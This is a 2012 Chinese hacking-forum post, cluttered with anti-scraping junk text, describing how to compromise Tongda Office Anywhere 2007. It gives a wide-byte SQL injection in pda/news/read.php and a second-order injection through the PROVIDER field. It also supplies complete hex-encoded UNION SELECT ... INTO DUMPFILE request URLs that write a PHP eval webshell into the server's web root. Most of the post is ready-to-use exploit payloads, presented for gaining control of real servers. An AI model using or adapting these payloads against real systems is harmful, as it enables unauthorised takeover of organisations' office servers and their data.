找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2526|回复: 0
打印 上一主题 下一主题

通达OA2007版本漏洞及getshell

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-20 08:09:24 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
目前测试通达OA2007版本, L+ v" E6 _% H- F1 K1 l8 O
8 {/ d7 v1 z2 h) {1 e

3 {- E6 F+ D! m: m, [3 MOffice Anywhere 2007 网络智能办公系统% s# p  W* r) y+ K+ O

! E+ ^& a1 V' `9 t5 e7 Nhttp://127.0.0.1/pda/news/read.php?P=%cf'    猪点。   暴web目录..
% B- Q3 P. Y+ V / o/ ?) j& H" q

  S% d. `* C2 u; u+ t( d9 [这个时候看了下代码,存在注入的那个变量的语句中第3个字段,在该文件下面被另外个select语句调用了,灵光一闪,大概思路是这样的+ o  \3 P3 O" k8 f* `

* `$ H8 \  l( m% A  ^! h例如:SELECT * from USER where USER_ID='{$USERNAME}'  5 r+ w$ T+ ^( ^* F( {
其中有这么段字段声明$PROVIDER = $ROW['PROVIDER'];被下面个语句$query1 = "SELECT * from USER where USER_ID='{$PROVIDER}'";带入查询了
* \! p2 ^7 o4 p% G . E" F( n3 l) S# r1 _; Q9 C5 e
这个时候我们是不是可以组合起来使用哪?
5 D$ U' q( k8 e( D8 ~1 M, n
& r% q# {& g" ?: T. v1 v第一条语句开始注入,union select 1,2,3,4,5,6,7,8,9,10...,比如第3个是PROVIDER字段,我们这样% A; {# r8 g$ ^/ Q
union select 1,2,'UNION SELECT 1,1,1,'<?php eval($v);?>',1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 into dumpfile'B:/m.php'#,4,5,6,7,8,9,10
* Y5 U. Q3 ]/ {/ M/ J# k; u
9 o! u7 W# B7 C! U$ h. V1 M这样'UNION SELECT 1,1,1,'<?php eval($v);?>',1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 into dumpfile'B:/m.php'#这个语句就带入第二条语句去写webshell了0 s- L" W8 r, ~6 D: G" p

% P1 o5 N& k6 {/ l6 q( Q  p那么问题来了,单引号可以吗?当然是不可以的,^_^。。。: ^+ n4 k5 X( Y' I+ ~
" V* j; {& o8 m" ^. g# Y& `
那么我们用字符串格式带入进行hex编码+ {' P. w' n) W$ z
# j: p7 P: x1 E! X
%cf'UNION SELECT 1,2,3,0x27554e494f4e2053454c45435420312c312c312c273c3f706870206576616c282476293b3f3e272c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c3120696e746f2064756d7066696c6527423a2f6d2e7068702723,5,6,7,8,9,10,11,12,13,14,15,16%23, j- o$ Y6 e2 m; b0 ]0 @& d
8 C) G' a! h' I4 f# g
测试ok,获取oa的webshell
  F( F* R2 r& {; H# E5 _( }
2 z2 i, V0 p% d; a# b! o0 b 2 q2 ^8 ]3 O) |
pda/news/read.php?P=%cf'or%281=1%29%23&NEWS_ID=%cf'UNION SELECT 1,2,3,0x27554E494F4E2053454C45435420312C312C312C273C3F706870206576616C282476293B3F3E272C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C3120696E746F2064756D7066696C6527443A2F4D594F412F776562726F6F742F6D2E7068702723,5,6,7,8,9,10,11,12,13,14,15,16%23& Y# G5 O" ^6 G$ s
直接getwebshell
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表